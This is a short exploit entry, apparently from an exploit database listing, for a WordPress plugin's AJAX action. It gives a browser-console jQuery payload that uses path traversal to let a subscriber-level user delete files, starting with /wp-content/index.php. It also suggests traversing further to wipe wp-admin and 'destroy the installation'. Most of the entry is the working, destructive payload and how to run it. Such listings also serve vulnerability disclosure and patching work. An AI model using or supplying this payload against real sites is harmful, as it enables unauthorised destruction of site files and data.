Share
## https://sploitus.com/exploit?id=WPEX-ID:1ADA2A96-32AA-4E37-809C-705DB6026E0B
As an authenticated user, with a role as low as subscriber, viewing the admin the dashboard (/wp-admin/index.php), run the below command in the Web Developer console of the web browser. This will delete /wp-content/index.php file ("silence is golden"). You can also do /../../../** or /../../../wp-admin/ or... (assuming you want to destroy the installation).

jQuery.post(ajaxurl,{action:"omgf_ajax_empty_dir",section:"/../../index.php"})